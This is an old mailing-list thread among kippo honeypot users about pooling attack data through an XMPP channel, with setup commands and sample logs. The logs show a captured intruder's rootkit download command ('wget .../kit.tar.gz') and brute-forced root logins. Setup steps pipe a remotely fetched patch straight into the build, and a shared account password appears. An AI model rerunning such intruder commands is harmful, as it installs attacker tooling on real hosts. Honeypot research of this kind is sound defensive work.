Sorry everyone for being quiet after starting this group, but I was offered a job on the other side of the country and needed to move, start work, and all the stuff that goes with that. But I found myself with a free weekend and I decided it was a good time to setup a server with a, at least in the beginning, blog for us to collectively write about kippo and honeypots in general. we can as a group decide whether we what to do something different. Now I have no problem setting up a VPS to solely host the website and whatever other stuff we want to have there for group access. But if someone has another idea, I am willing to hear it. The second is, I no clue what domain to get for this website. any one have any ideas?
- biosshadow
--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
For more options, visit this group at http://groups.google.com/group/kippousers?hl=en.
I am interested in this. Not how many other ppl are, but it would make sharing stats easier.
Andrew top posting?
> Justin Elze wrote:
>> Bump since everyone is back to only chatting on twitter about this...
>>
>> Any interest in a centralized MySQL database starting off with a few people
>> and tracking results from around the world?
On Fri, Oct 22, 2010 at 3:43 PM, AndrewWaite <a...@infosanity.co.uk> wrote:
> theoretically should be simple, just needs a publicly accessible MySQL
> daemon and people to reconfigure there sensors. However, I can see a
> number of problems before this can/will get off the ground:
central db? bad idea for all obvious reasons.
I'd go for a distributed network and everybody can have his own
database, with information from all sensors as outlined? here:
http://groups.google.com/group/kippousers/msg/f0d0ecb823e67f0e
I setup docs how to install prosody and host a branch of the code with
the patches applied, http://carnivore.it/2010/10/13/xmpp_server
Markus
--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
It could write to an additional table in the local kippo database to keep
track of which sessions have been sent forward.
Something like this would be easy for anyone to implement in their favorite
language and platform, and hopefully my laziness with kippo development isn't
hurting deployments like this :)
> To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
On Fri, Oct 22, 2010 at 5:08 PM, Justin Elze <formu...@gmail.com> wrote:
> Are you going to rewrite Kippo to export data into a xmpp server?
Actually I doubt a rewrite would be required in any way, it would plug
in the same way as mysql, and twisted even has multiple protocol
implementations for xmpp.
> This is what happened last time everyone jumped in with great ideas but no
> real motivation to follow up.
How can you expect anybody to contribute anything if there is no final
"we are interested in the functionality and accept patches" or at
least a basic level of interest?
> No issues if someone wants to make XMPP work with kippo since it obviously
> scales well....Kippo isn't going to catch some 0day attack or anything
> overly interesting.
I don't see the point.
> However was more interested in statistical information source IP, source
> country, password combos, where backdoors are hosted.
Which is exactly the information one could distribute via xmpp.
If you want to look at it before making a point, let me hook you up
with the required credentials to do so.
Markus
Markus
--
You received this message because you are subscribed to the Google Groups "kippo users" group.
To post to this group, send email to kippo...@googlegroups.com.
To unsubscribe from this group, send email to kippousers+...@googlegroups.com.
For more options, visit this group at http://groups.google.com/group/kippousers?hl=en.
On Sat, Oct 23, 2010 at 12:39 AM, Justin Elze <formu...@gmail.com> wrote:
> Would you be the person developing the XMPP integration? What
> assistance/resources would you need?
Testers,
svn co https://svn.ik.nu/wokkel/branches/wokkel-muc-client-support-24 wokkel
cd wokkel
python setup.py install
svn checkout http://kippo.googlecode.com/svn/trunk/ kippo-xmpp
cd kippo-xmpp
wget http://p.carnivore.it/Kx015D?download -O /dev/stdout | patch -p0
cp kippo.cfg.dist kippo.cfg
# edit kippo.cfg, allow the xmpp section, edit kippo-revents to kippo-events
twistd -ny kippo.tac
-------------------
todo?
* currently it replaces the mysql logging, I did not understand the
twisted thing to have multiple log observers, should be fixed by
somebody who understands twisted
* the xmpp client is initialized in the tac file, it does not start
initialized somewhere else, I *guess* thats a twisted feature, but
maybe somebody who understands twisted can fix it
* set self.xmppclient.logTraffic to False if you are annoyed by the
messages /dblog/xmpp.py:57)
* the code supports anonymizing the honeypots ip address, this is
turned on by default and there is no config option yet to turn it off,
so the honeypot always reports itself as 127.0.0.1
* xmlns url for kippo is wrong
* bribe somebody to apply the patch to svn, so we can beautify it
* backend code to retrieve the messages from xmpp and store in a
database, I'd adjust the pg_backend code dionaea ships with to deal
with the kippo namespace & messages
documentation?
* it uses a special wokkel branch, which adds muc to twisteds xmpp stack.
* you specify a xmpp server, username, password, muc, and channels for
the different signals you have (client connected, client disconnected,
command, login, ...), and it joins the channel, and sends the message
to the channel.
* once ssh-action happens, it sends a proper formatted xml message to
the channel, I figured the xml format myself, it is similar to the
format I use for dionaea.
Some example messages:
CreateSession:
<kippo xmlns='http://http://kippo.googlecode.com'
type='createsession'><session local_host='127.0.0.1' local_port='2222'
session='da2dde7c2e9b4f96bdd94172eb274c9f' remote_host='192.168.53.21'
remote_port='4271'/></kippo>
ConnectionLost:
<kippo xmlns='http://http://kippo.googlecode.com'
type='connectionlost'><session
session='da2dde7c2e9b4f96bdd94172eb274c9f'/></kippo>
Command:
<kippo xmlns='http://http://kippo.googlecode.com'
type='command'><command session='349ae44535d34bab9c548f3af21f0fcd'
command='known'>cd /tmp</command></kippo>
Yep, there is *some* overhead, but it is easy to parse.
> Anyone else have useful suggestions?
Yep, I setup a privileged account for you, if you want to hack a
backend base on pg_backend, you can use the user
ki...@sensors.carnivore.it with password kippo,
you got elevated privileges on the channel kippo-events in the
dionaea.sensors.carnivore.it muc, so there is no reason not to start
hacking on it.
If you access the service with an xmpp client like psi, turn on the
"XML Console",
as the messages are unencoded xml psi does not render them properly.
If nobody stands up, I'll contribute the backend code too, and I
promise it won't be mysql compatible.
Markus
On 10/23/10 7:19 AM, Markus wrote:
Client code:
Updated patch for latest kippo revision to report to xmpp:
http://p.carnivore.it/uUovYX
Installation as outlined in previous mail.
Backend code
code:
http://p.carnivore.it/RqMsyp
# aptitude install python-pyxmpp python-pgsql
with db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M
dionaea.sensors.carnivore.it -C kippo-events -s DBHOST -u DBUSER -d
xmpp -p DBPASS -f /tmp/
without db
./pg_backend.py -U ki...@sensors.carnivore.it -P kippo -M
dionaea.sensors.carnivore.it -C kippo-events -f /tmp/
Database schema addon which adds the required tables for kippo in the
kippo namespace:
http://p.carnivore.it/80XWG4
schema is similar to kippos own schema, basically I just got rid of
calling every primary key "id" to allow natural joining.
basic instructions for the database, I don't remember all steps, in
case you get it working, please complete the steps required.
install postgres,
create a user "xmpp"
su postgres
createuser --no-createdb --encrypted --login --pwprompt
--no-createrole --no-superuser xmpp
edit /etc/postgresql/8.4/main/pg_hba.conf
add a line to allow the xmpp user to connect to the database from
local host with password authentication
# TYPE DATABASE USER CIDR-ADDRESS METHOD
local xmpp xmpp
md5
restart postgres to have the changes taking effect.
create a database "xmpp"
createdb --owner xmpp xmpp
apply the schema, start he backend code
psql -U xmpp xmpp < theschema.sql
the backend code writes some status information on the console:
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV]
createsession: 127.0.0.1 127.0.0.1 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] version
SSH-2.0-OpenSSH_5.1p1 Debian-6ubuntu2 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login
False root test 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] : login
True root 123456 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command
cd /tmp 2390be85d17645ecb3a0b936cd275dfe
[kippo-...@dionaea.sensors.carnivore.it/anonymous-NdpSmsbV] command
wget http://www.example.com/root/kit.tar.gz
2390be85d17645ecb3a0b936cd275dfe
Markus